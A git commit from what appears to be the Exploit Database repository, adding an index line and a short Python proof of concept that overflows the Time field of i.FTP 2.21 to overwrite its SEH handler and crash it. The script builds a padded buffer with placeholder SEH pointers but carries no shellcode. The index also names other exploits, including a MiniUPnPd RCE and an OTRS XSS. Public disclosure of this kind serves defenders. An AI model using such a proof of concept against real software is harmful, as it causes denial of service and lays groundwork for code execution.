DB: 2015-04-29

1 new exploits
This commit is contained in:
Offensive Security 2015-04-29 05:02:03 +00:00
parent 67447e4b29
commit 428ec4393d
2 changed files with 23 additions and 0 deletions

View file

@ -33240,3 +33240,4 @@ id,file,description,date,author,platform,type,port
36839,platforms/multiple/remote/36839.py,"MiniUPnPd 1.0 - Stack Overflow RCE for AirTies RT Series (MIPS)",2015-04-27,"Onur Alanbel (BGA)",multiple,remote,0
36841,platforms/windows/local/36841.py,"UniPDF Version 1.2 - 'xml' Buffer Overflow Crash PoC",2015-04-27,"Avinash Thapa",windows,local,0
36842,platforms/php/webapps/36842.pl,"OTRS < 3.1.x & < 3.2.x & < 3.3.x - Stored Cross-Site Scripting (XSS)",2015-04-27,"Adam Ziaja",php,webapps,0
36847,platforms/windows/dos/36847.py,"i.FTP 2.21 SEH Overflow Crash PoC",2015-04-28,"Avinash Thapa",windows,dos,0

Can't render this file because it is too large.

22
platforms/windows/dos/36847.py Executable file
View file

@ -0,0 +1,22 @@
# iFTP 2.21 SEH overwritten Crash PoC
# Author: Avinash Kumar Thapa "-Acid"
# Date of Testing : 28th April'2015
# Vendor's home page: http://www.memecode.com/iftp.php
# Software's Url: http://www.memecode.com/data/iftp-win32-v2.21.exe
# Crash Point: Go to Schedule > Schedule download > {+} >Time field
buffer = "A"*600
buffer += "BBBB" # Pointer to Next SEH Record
buffer += "CCCC" # SEH HANDLER
file = "test.txt"
f = open(file, "w")
f.write(buffer)
f.close()